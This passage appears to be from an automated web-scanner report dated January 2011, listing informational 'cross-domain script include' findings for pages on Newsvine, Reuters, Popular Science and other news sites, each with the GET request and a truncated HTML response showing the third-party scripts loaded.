<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineoddnews&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.566. http://www.polls.newsvine.com/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /politics HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinepolitics&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.567. http://www.polls.newsvine.com/religion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /religion

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /religion HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinereligion&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.568. http://www.polls.newsvine.com/science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /science

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /science HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinescience&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.569. http://www.polls.newsvine.com/sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /sports

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://nbcsports.msnbc.com/js/nbcsports.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinesports&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://nbcsports.msnbc.com/js/nbcsports.js"></script>
...[SNIP]...

23.570. http://www.polls.newsvine.com/technology

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /technology

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technology HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinetechnology&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.571. http://www.polls.newsvine.com/travel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /travel

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travel HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvinetravel&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.572. http://www.polls.newsvine.com/us-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /us-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineusnews&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.573. http://www.polls.newsvine.com/world-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /world-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /world-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvineworldnews&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.574. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</script> -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="job-listing-block">
<script type="text/javascript" src="http://edge.jobthread.com/jobs.popsci.com/feeds/jobroll/?num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.575. http://www.popularmechanics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularmechanics.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.popularmechanics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 67327
Content-Type: text/html
Cache-Control: max-age=20
Date: Sun, 30 Jan 2011 03:18:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
</script>
   <script language="javascript" type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cstumbleupon%2Cmyspace%2Cybuzz%2Cgoogle_bmarks%2Cfriendfeed%2Cblogger%2Cdelicious%2Cwordpress%2Cyahoo_bmarks%2Ctypepad%2Cdigg%2Creddit%2Ctechnorati%2Cmixx%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin&amp;headerbg=%235e50a1&amp;linkfg=%235e50a1&amp;headerTitle=SHARE%20POPULAR%20MECHANICS!&amp;offsetLeft=-40&amp;onmouseover=false"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</div>
   <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<!-- Audience Science script -->
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=I09839" CHARSET="ISO-8859-1"></script>
...[SNIP]...

23.576. http://www.reuters.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache
Expires: Sun, 30 Jan 2011 02:01:03 GMT
Last-UpdatedL: Sun, 30 Jan 2011 01:45:03 GMT
Age: 134
Vary: Accept-Encoding
Content-Length: 84634
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: s263567nj2el43.uswhwk6.savvis.net <![endif]-->
<!--[if !IE]> Cached on Sun, 30 Jan 2011 02:0
...[SNIP]...
</style><script src="http://cdn.echoenabled.com/clientapps/v2/jquery-pack.js"></script>
<script src="http://cdn.js-kit.com/scripts/echo-stream.js"></script>
...[SNIP]...
<!-- Survey -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d821869/2/822749/randm.js"></script>
...[SNIP]...

23.577. http://www.sciencenews.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencenews.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.sciencenews.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6bcr7p0ka1rpr4bsk02joad525; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="head">

<!-- Meta -->

<meta http-equiv="Content-Type"
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.578. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
